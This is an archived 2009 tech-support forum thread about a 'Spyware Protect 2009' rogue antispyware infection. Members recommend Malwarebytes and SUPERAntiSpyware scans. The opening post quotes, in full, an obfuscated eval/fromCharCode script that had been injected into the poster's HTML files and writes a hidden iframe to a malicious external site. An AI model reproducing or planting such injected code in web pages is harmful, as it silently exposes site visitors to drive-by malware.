Spyware, Viruses, & Security forum

General discussion

Pleaseeee help!

by helpneeded09 / March 15, 2009 11:02 PM PDT

Hello,

This is very very critical, and I really need some help.

So, my computer was acting wierd and when we took a look at it, we found spyguard.exe and I was getting the Spyware Protect 2009 popup. We realized that something is wierd, until the next day our network got "infected" by virus, I guess. Now here is my confusion.

The following website says that Spyware Protect is harmless:
http://www.spywarevoid.com/remove-spyware-guard-2008-spywareguard-2008-removal.html

And when I say that our network was infected, all of our HTML files had the following javascript code:

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,103,103,101,51,61,34,98,97,34,59,118,97,114,32,119,51,52,53,61,34,109,34,59,118,97,114,32,114,101,54,61,34,114,111,116,46,34,59,118,97,114,32,114,114,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,103,103,101,51,43,39,39,43,119,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113,97,47,39,43,39,105,110,100,101,120,46,39,43,39,112,104,112,39,43,39,34,32,115,116,121,108,101,61,34,100,105,115,39,43,39,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48,56,56,56,56,56,56,56))</script>

Upon deciphering it, we came to know that it is going to a website which was later taken down when reported for virus.

This code used an iframe to pull some information.

Now, here is my confusion.

Are both the events related? I read Spyware Protect is harmless, but could it have inserted the virus onto our network? Is the javascript code related to the spyguard.exe found on my machine?

Any help in this matter would be greatly appreciated.

Thanks in advance.

Discussion is locked
You are posting a reply to: Pleaseeee help!
The posting of advertisements, profanity, or personal attacks is prohibited. Please refer to our CNET Forums policies for details. All submitted content is subject to our Terms of Use.
Track this discussion and email me when there are updates

If you're asking for technical help, please be sure to include all your system info, including operating system, model number, and any other specifics related to the problem. Also please exercise your best judgment when posting in the forums--revealing personal information such as your e-mail address, telephone number, and address is not recommended.

You are reporting the following post: Pleaseeee help!
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
Collapse -
Try this link to see if harmless
by Darrell / March 16, 2009 12:36 AM PDT
In reply to: Pleaseeee help!
Collapse -
It isn't even listed there - but there are other sites
by Darrell / March 16, 2009 12:43 AM PDT

There are number of reputable anti-spyware information sites on the Net. Among the best are:

SpywareInfo.com
SpywareHammer.com
CounterExploitation
Doxdesk.com
Ben Edelman - Spyware Research
FTC Spyware Workshop Information
SpywareGuide.com
PC Pitstop - Spyware Information Center Alliance of Security Analysis Professionals (ASAP)
CDT: Campaign Against Spyware
Aumha.org - The Parasite Fight
SpywareBeware!
Spyware, Adware, & Other Nuisances
Voice of the Public
Webhelper4U.com

Collapse -
I too am infected
by yuda101 / March 16, 2009 5:42 AM PDT

Spyware Protect 2009 alert got into my computer as a misleading application. I received a security alert that looked like a Windows warning that I was disconnected from a firewall. I should have known better (and actually do), but like an idiot, I connected to the firewall through that, and immediately allowed a Trojan / virus to enter my computer. I can get to my search engine home page, but cannot connect to any site without a window that "states this site may be bad for your computer". It won't let me run spybot or Superantispyware software but will let me run AVG. AVG is finding 84 files infected with Win32/Cryptor. The alert keeps popping up and I keep saying "No". I haven't downloaded and won't pay. It is a virus! SOMEONE PLEASE HELP!!

Collapse -
MalwareBytes Anti Malware should do the "job".....
by Marianna Schmudlach / March 16, 2009 5:46 AM PDT
In reply to: I too am infected
Collapse -
Spyware Protect 2009 and Spy Protect
by Carol~ Moderator / March 16, 2009 5:56 AM PDT
In reply to: Pleaseeee help!

In regard to the Spyware Protect 2009 pop up, please read:

"How to remove Spyware Protect 2009 (Uninstall Instructions)"

Download Malwarebytes' Anti-Malware from here or here.

Double-click on mbam-setup.exe to install the application.

* Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
* If an update is found, it will download and install the latest version.
* Once the program has loaded, select Perform Full Scan, then click Scan.
* The scan may take some time to finish, so please be patient.
* When the scan is complete, click OK, then Show Results to view the results.
* Make sure that everything is checked, and click Remove Selected.
* When disinfection is completed, a log will open in Notepad and you may be prompted to restart (see Extra Note below).
* The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.

Extra Note:
If MBAM encounters a file that is difficult to remove, you may be asked to reboot your computer so it can proceed with the disinfection process. Regardless if prompted to restart the computer or not, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware.

MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you after scanning with MBAM. Temporarily disable these programs or permit them to allow the changes.

You wrote "Is the javascript code related to the spyguard.exe found on my machine?"

The "spyguard.exe" is related to Spy Guard which is a rogue-antispyware application. This application uses deceptive and aggressive advertising in order to scare you into purchasing their products. It is also known to come bundled with malware.

"How to remove The Spy Guard (Removal Instructions)"

If Malwarebytes' Anti-Malware doesn't remove it, scroll down the above page, to where you see the instructions for how to use the SmithFraudFix.

Best of luck..
Carol

Collapse -
(NT) Correct: 'and Spy Protect' should read 'and Spy Guard'
by Carol~ Moderator / March 16, 2009 5:59 AM PDT
Collapse -
Thanks...
by helpneeded09 / March 18, 2009 2:21 AM PDT

Thank you for all your replies... Appreciate it!

So, if I understand it right, only by clicking on those popups, can a virus/Trojan enter your machine and maybe spread to your network?! I know for sure that I had not clicked on any of those Spyware alerts; could the javascript code still have entered because of this Spyguard.exe or Spyware Protect 2009?

Collapse -
Did you run the scan?
by Carol~ Moderator / March 18, 2009 3:09 AM PDT
In reply to: Thanks...

What were the results? You stated in your original post "the computer was acting wierd and when we took a look at it, we found spyguard.exe and I was getting the Spyware Protect 2009 popup". The spyguard.exe indicates some level of infection, as does the pop up. If you haven't done so, I would again suggest scanning with Malwarebytes' Anti-Malware.

If you run into any obstacles, when trying to install it or run it, please post back and you'll get further instructions.

Carol

Collapse -
Reply to Did you run the scan?
by helpneeded09 / March 24, 2009 12:45 AM PDT
In reply to: Did you run the scan?

Well... That is exactly what my confusion is! Scanned the computer, found nothing except for this spyguard.exe/Spyware Protect 2009. Because of this, it was concluded that my machine had caught virus. However, I did get all my information back as well and everything was clean. Hence,

1. If my machine would have hit by an awful virus, then I would have lost all of my information.
2. Again, I go back to my main question. Would the javascript junk I pasted earlier be "created" and "inserted" into each of the HTML files on our network because of this spyware protect?

Thanks!

Collapse -
I gave up.
by yuda101 / March 18, 2009 3:14 AM PDT
In reply to: Thanks...

I gave up on Spyware Protect 2009. I never downloaded that either, but did click on a firewall security warning, which is probably the opening it wanted.
I had no luck getting rid of the spyware as my computer refused to run anything. I have been having problems with it anyway, so took it to the computer mechanic for a tuneup. He's going to wipe it clean and reload my OS and install a new battery and I'm starting all over again - from scratch. I backed all my documents and photos up on a flash drive and will just leave them there and stop cluttering up my computer with all that stuff. I had 5 years of work related projects, political activity and personal crapola on that computer. In addition, I probably had a small cat (amount of hair) stored in the CPU. Cleanup will hopefully result in a new computer experience. I am glad to have found this site tho, and thank you all for the help.

Collapse -
For the future..
by Carol~ Moderator / March 18, 2009 3:36 AM PDT
In reply to: I gave up.

yuda101..

Had you mentioned to Marianna, your 'computer refused to run anything', there is no question in my mind, she would have been able to help you, as she has helped other's in the same predicament. Guess it's history now!

Just as an aside.. I hear you about the "small cats". While the cat knows it's a forbidden area, apparently his hair doesn't!! Sad

Enjoy your new "computing experience" and ...
Safe surfing in the future ..
Carol

Collapse -
For the future.
by phil66 / March 18, 2009 11:09 AM PDT
In reply to: For the future..

Look for it

Collapse -
(NT) I be lookin' ;-)
by Carol~ Moderator / March 18, 2009 12:30 PM PDT
In reply to: For the future.
Collapse -
Becareful To Scan That Flash Drive
by tobeach / March 18, 2009 2:55 PM PDT
In reply to: I gave up.

before allowing it back onto your network! Possible you did back up while infected?

If so, there's an AV program you can install on your machine to clean the Flash drive when you attach it called: Flash_Disinfector.exe

I believe it's freeware & you can Google for it. Just a thought. Happy

Collapse -
Thank You for the Flash Drive info
by yuda101 / March 19, 2009 1:04 AM PDT

I REALLY appreciate that advice - never gave it a thought. When I pick up my computer, I'll ask him to check it out so I don't bring that home. I'm currently using the other computer that was networked but have not shared files or printers, etc. and disconnected this one from the Gateway when the infected PC was turned on. We're taking this one to be cleaned up as soon as the other one is up and running on the internet although it shows no signs of infection and works well, but slowly (even more cat hair likely). Plus it is 9 years old and only has 256 mgs of RAM.
Thanks again for the warning.

Collapse -
Spyware Protect 2009
by David-s_CNET_acct / March 31, 2009 6:09 AM PDT

We were hit by this over the weekend (3/29/9) (and we have McAfee paid subscription). We used Spyware Doctor (http://www.spyware-assistance.org/dangerous-trojans/s/Spyware-Protect-2009/Remove-Spyware-Protect-2009.php?gclid=CNbwvqyRyZkCFcdM5Qod7hDwvA ) and altho it removed the annoying continuous taskbar pop-up and the dialogue box that blocked the center of the screen, I've read somewhere that Spyware Doctor pops up an ad for itself in IE and the paid version clears fake viruses.
I have a new problem, tho. When we put the wintel laptop in sleep mode and shut the lid of the case, it gives off the ping-piing sound of the case being opened all night long. We finally, groggily, shut down the computer and unplugged the ethernet cable, but I don't know what sort of malware is still doing what sort of havoc.

Collapse -
Scan your computer with the following.....
by Marianna Schmudlach / March 31, 2009 6:53 AM PDT
In reply to: Spyware Protect 2009

Please download Malwarebytes Anti-Malware (v1.33) and save it to your desktop.
alternate download link 1
alternate download link 2
If you have a previous version of MBAM, remove it via Add/Remove Programs and download a fresh copy.

* Make sure you are connected to the Internet.
* Double-click on mbam-setup.exe to install the application.
* When the installation begins, follow the prompts and do not make any changes to default settings.
* When installation has finished, make sure you leave both of these checked:
o Update Malwarebytes' Anti-Malware
o Launch Malwarebytes' Anti-Malware
* Then click Finish.

MBAM will automatically start and you will be asked to update the program before performing a scan.

* If an update is found, the program will automatically update itself.
* Press the OK button to close that box and continue.
* If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install. Alternatively, you can update through MBAM's interface from a clean computer, copy the definitions (rules.ref) located in C:\Documents and Settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware from that system to a usb stick or CD and then copy it to the infected machine.

On the Scanner tab:

* Make sure the "Perform Quick Scan" option is selected.
* Then click on the Scan button.
* If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
* The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
* When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
* Click OK to close the message box and continue with the removal process.

Back at the main Scanner screen:

* Click on the Show Results button to see a list of any malware that was found.
* Make sure that everything is checked, and click Remove Selected.
* When removal is completed, a log report will open in Notepad.
* The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
* Copy and paste the contents of that report in your next reply and exit MBAM.

Notes: If MBAM encounters a file that is difficult to remove, you may be asked to reboot your computer so it can proceed with the disinfection process. Regardless if prompted to restart the computer or not, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware.

MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you after scanning with MBAM. Please temporarily disable such programs or permit them to allow the changes. Click this link to see a list of programs that should be disabled.



Also:

Download and scan with SUPERAntiSpyware Free for Home Users

* Double-click SUPERAntiSpyware.exe and use the default settings for installation.
* An icon will be created on your desktop. Double-click that icon to launch the program.
* If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download and unzip them from here.)
* Under "Configuration and Preferences", click the Preferences button.
* Click the Scanning Control tab.
* Under Scanner Options make sure the following are checked (leave all others unchecked):

Close browsers before scanning.
Scan for tracking cookies.
Terminate memory threats before quarantining.

* Click the "Close" button to leave the control center screen.
* Back on the main screen, under "Scan for Harmful Software" click Scan your computer.
* On the left, make sure you check C:\Fixed Drive.
* On the right, under "Complete Scan", choose Perform Complete Scan.
* Click "Next" to start the scan. Please be patient while it scans your computer.
* After the scan is complete, a Scan Summary box will appear with potentially harmful items that were detected. Click "OK".
* Make sure everything has a checkmark next to it and click "Next".
* A notification will appear that "Quarantine and Removal is Complete". Click "OK" and then click the "Finish" button to return to the main menu.
* If asked if you want to reboot, click "Yes".

Popular Forums
icon
Computer Newbies 10,686 discussions
icon
Computer Help 54,365 discussions
icon
Laptops 21,181 discussions
icon
Networking & Wireless 16,313 discussions
icon
Phones 17,137 discussions
icon
Security 31,287 discussions
icon
TVs & Home Theaters 22,101 discussions
icon
Windows 7 8,164 discussions
icon
Windows 10 2,657 discussions

Does BMW or Volvo do it best?

Pint-size luxury and funky style

Shopping for a new car this weekend? See how the BMW X2 stacks up against the Volvo XC40 in our side-by-side comparison.